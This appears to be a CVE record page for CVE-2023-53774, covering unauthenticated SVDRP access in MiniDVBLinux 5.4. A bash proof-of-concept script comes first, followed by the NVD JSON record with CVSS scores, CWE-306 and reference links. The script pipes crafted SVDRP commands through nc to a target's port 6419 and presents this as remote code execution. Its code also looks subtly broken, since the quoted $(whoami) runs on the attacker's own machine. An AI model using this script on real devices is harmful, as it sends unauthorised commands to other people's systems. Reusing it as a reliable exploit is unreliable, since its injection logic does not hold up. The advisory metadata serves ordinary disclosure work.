CVE-2023-53774

#!/bin/bash # CVE-2023-53774 PoC - MiniDVBLinux SVDRP Remote Code Execution # Target: MiniDVBLinux 5.4 with VDR SVDRP service TARGET_HOST="$1" TARGET_PORT="6419" if [ -z "$TARGET_HOST" ]; then echo "Usage: $0 <target_ip>" exit 1 fi echo "[*] CVE-2023-53774 PoC for MiniDVBLinux SVDRP RCE" echo "[*] Target: $TARGET_HOST:$TARGET_PORT" # Connect to SVDRP and send malicious command # The vulnerability allows command injection through SVDRP protocol (echo -e "PING;1\nLSTR\nQUIT" | nc -q 2 "$TARGET_HOST" "$TARGET_PORT") & sleep 1 # Example: Send crafted SVDRP command for RCE echo "[+] Sending malicious SVDRP command..." echo -e "MESG '$(whoami)'\nQUIT" | nc -w 3 "$TARGET_HOST" "$TARGET_PORT" echo "[+] Check if command was executed on target system"

{"cve": {"id": "CVE-2023-53774", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:52.780", "lastModified": "2025-12-19T19:16:19.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MiniDVBLinux 5.4 contains a remote code execution vulnerability in the SVDRP protocol that allows remote attackers to send commands to manipulate TV systems. Attackers can send crafted SVDRP commands through the svdrpsend.sh script to execute messages and potentially control the video disk recorder remotely."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.4", "matchCriteriaId": "2D9CAD03-85CC-41CC-B745-371250902E61"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51093", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.minidvblinux.de", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/minidvblinux-simple-videodiskrecorder-protocol-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}